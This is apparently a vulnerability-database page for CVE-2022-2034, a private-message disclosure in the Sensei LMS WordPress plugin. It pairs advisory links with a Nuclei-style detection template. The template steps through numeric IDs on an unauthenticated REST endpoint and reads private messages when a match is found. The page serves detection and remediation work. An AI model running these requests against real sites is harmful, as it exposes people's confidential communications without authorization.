| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2022-2034 | 29 Aug 202218:15 | – | attackerkb | |
| CVE-2022-2034 | 29 Aug 202222:34 | – | circl | |
| WordPress plugin Sensei LMS 安全漏洞 | 29 Aug 202200:00 | – | cnnvd | |
| CVE-2022-2034 | 29 Aug 202214:40 | – | cve | |
| CVE-2022-2034 Sensei LMS < 4.5.0 - Unauthenticated Private Messages Disclosure via Rest API | 29 Aug 202214:40 | – | cvelist | |
| CVE-2022-2034 | 29 Aug 202218:15 | – | nvd | |
| WordPress Sensei LMS plugin <= 4.4.3 - Unauthenticated Private Messages Disclosure via Rest API vulnerability | 4 Aug 202200:00 | – | patchstack | |
| Design/Logic Flaw | 29 Aug 202218:15 | – | prion | |
| PT-2022-14565 · WordPress · Sensei Lms | 29 Aug 202200:00 | – | ptsecurity | |
| CVE-2022-2034 | 22 May 202523:35 | – | redhatcve |
id: CVE-2022-2034
info:
name: WordPress Sensei LMS <4.5.0 - Information Disclosure
author: imhunterand
severity: medium
description: |
WordPress Sensei LMS plugin before 4.5.0 is susceptible to information disclosure. The plugin does not have proper permissions set in a REST endpoint, which can allow an attacker to access private messages.
impact: |
Unauthenticated attackers can access private Sensei LMS messages via unprotected REST API endpoints, potentially exposing confidential student-teacher communications.
remediation: |
Upgrade WordPress Sensei LMS to version 4.5.0 or later to mitigate this vulnerability.
reference:
- https://wpscan.com/vulnerability/aba3dd58-7a8e-4129-add5-4dd5972c0426
- https://hackerone.com/reports/1590237
- https://wordpress.org/plugins/sensei-lms/advanced/
- https://nvd.nist.gov/vuln/detail/CVE-2022-2034
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2022-2034
cwe-id: CWE-639
epss-score: 0.01868
epss-percentile: 0.76732
cpe: cpe:2.3:a:automattic:sensei_lms:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 100
vendor: automattic
product: sensei_lms
framework: wordpress
tags: cve,cve2022,wp,disclosure,wpscan,sensei-lms,fuzz,hackerone,wordpress,wp-plugin,automattic,vuln
http:
- method: GET
path:
- "{{BaseURL}}/wp-json/wp/v2/sensei-messages/{{num}}"
payloads:
num: helpers/wordlists/numbers.txt
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'sensei_message'
- 'guid":{"rendered":'
condition: and
- type: word
part: header
words:
- application/json
- type: status
status:
- 200
# digest: 4a0a0047304502200a7370114126b4176ad51d5fc8574cc5e79e654024a0b6751a4b6b7d7628f5f10221009a79c121b2f9466b575eed1f15eb72edc0eb387bc11d91856e35a7b0ff2ca438:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation